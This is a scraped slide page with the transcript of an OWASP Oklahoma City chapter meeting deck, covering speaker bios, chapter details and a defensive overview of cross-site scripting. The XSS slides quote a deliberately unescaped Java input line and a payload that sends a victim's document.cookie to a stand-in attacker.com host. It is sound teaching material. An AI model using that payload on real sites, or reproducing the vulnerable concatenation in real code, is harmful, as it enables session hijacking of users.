Oklahoma City.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Hands on Demonstration for Testing Security in Web Applications
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.
Cross Site Scripting & SQL injection
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Browser Exploitation Framework (BeEF) Lab
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Website Hardening HUIT IT Security | Sep
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.
Workshop 3 Web Application Security Li Weichao March
Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.
Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
OWASP Update Seba Deleersnyder BE Board OWASP Belgium Chapter Meeting 17-Dec-2013.
Chapter 2. Core Defense Mechanisms. Fundamental security problem All user input is untrusted.
Cross-Site Attacks James Walden Northern Kentucky University.
OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.
OWASP Cambridge 2 nd December Agenda Networking, food and refreshments Welcome Colin Watson Global Application Security Survey & Benchmarking John.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
nd Joint Workshop between Security Research Labs in JAPAN and KOREA Marking Scheme for Semantic- aware Web Application Security HPC.
Cross Site Scripting and its Issues By Odion Oisamoje.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
OWASP London 4 th December Agenda Networking, food and refreshments Welcome Justin Clark Offensive OSINT Christian Martorella and Zigor Zumalde.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
4.01 How Web Pages Work.
Web Programming Language
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Group 18: Chris Hood Brett Poche
Module: Software Engineering of Web Applications
CSCE 548 Student Presentation Ryan Labrador
An Introduction to Web Application Security
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Chapter 7: Identifying Advanced Attacks
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Example – SQL Injection
Penetration Testing following OWASP
Finding and Fighting the Causes of Insecure Applications
A Security Review Process for Existing Software Applications
Marking Scheme for Semantic-aware Web Application Security
CSC 495/583 Topics of Software Security Intro to Web Security
AppExchange Security Certification
Finding and Fighting the Causes of Insecure Applications
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Protecting Against Common Web Application Vulnerabilities
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
4.01 How Web Pages Work.
Security: Attacks & Countermeasures
Exploring DOM-Based Cross Site Attacks
Web Application Development Using PHP
Presentation transcript:

Oklahoma City

Welcome! Thanks to our sponsors! OWASP RCB Bank Crossroads Information Security

Joe Sullivan Started in Infosec with a web hosting company in 1999 Started one of the first outsourced support companies for web hosting servers in 2000 Worked for an ecommerce company for 10 years in network security Currently CISO for RCB Bank 1 to 1 Risk Control & Investigations – Owner/Lead Investigator Consulting for Crossroads Information Security SANS Mentor SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

Jim Thavisouk Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer . He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including Department of Defense and Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corp program.

Stacy Dunn OWASP Oklahoma City Chapter Leader Information Security Analyst RCB Bank Board Member of Super! BitCon, a local gaming convention. Curator and Founder at Oklahoma Artcade. Super nerd.

Contact Information Joe Sullivan: joe.sullivan@owasp.org Jim Thavisouk: jim.thavisouk@owasp.org Stacy Dunn: stacy.dunn@owasp.org

Oklahoma City Chapter The official page is at: https://www.owasp.org/index.php/Oklahoma_City Twitter: @okcowasp FaceBook YouTube MeetUp: https://www.meetup.com/Oklahoma-City-Chapter-Meetup/ https://owasp.herokuapp.com/ <- Join us on Slack!

OWASP The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

OWASP Top 10 The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

OWASP Top 10 2017

Membership Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page. Membership is optional Meetings are open to everyone Guests are welcome Memberships help fund our chapter

Meetings Web Application Security Web Application Development Presentations Labs Networking Round Tables Food

The Future Conferences (IWS Coming Up) Speakers Presentations News Challenge Coins Promo Materials Volunteers are welcome!

Speaking of Presentations Cross Site Scripting XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications Better described as a code reflection attack How this works is an attacker crafts a URL with a script in it​ The script in the URL is sent to the server as input​ When the user accesses the URL the server reflects back the script contained in the URL​ The user’s browser processes the script and performs whatever action the script was set to run

Cross Site Scripting Attack Scenario HTML without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; Attacker modifies the CC parameter to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

More Cross Site Scripting Attacks Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning) Attacking log viewers and user interfaces with XSS Using the Browser Exploitation Framework (BEEF) to attack browsers https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/ Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more Good for getting a foothold on a network

Detecting Cross Site Scripting Attacks This is a noisy attack Generates logs SIEM can detect attacks, but may miss obfuscation techniques IPS can alert to XSS attacks IDS can alert to XSS attacks Web application firewall

Preventing Cross Site Scripting Filter out meta characters from requests – do this one the server side, and not the client side Microsoft offers a free anti-XSS library Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered. Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.

Preventing Cross Site Scripting Web application penetration tests regularly Test when changes are implemented to the web application Test when new attacks come out Work with your web application developer on testing and remediation

Discussion What would you like to get out of our meetings? Web Application Security Vulnerability Testing and Remediation Development Security Operations Penetration Testing Incident Response Defending Web Applications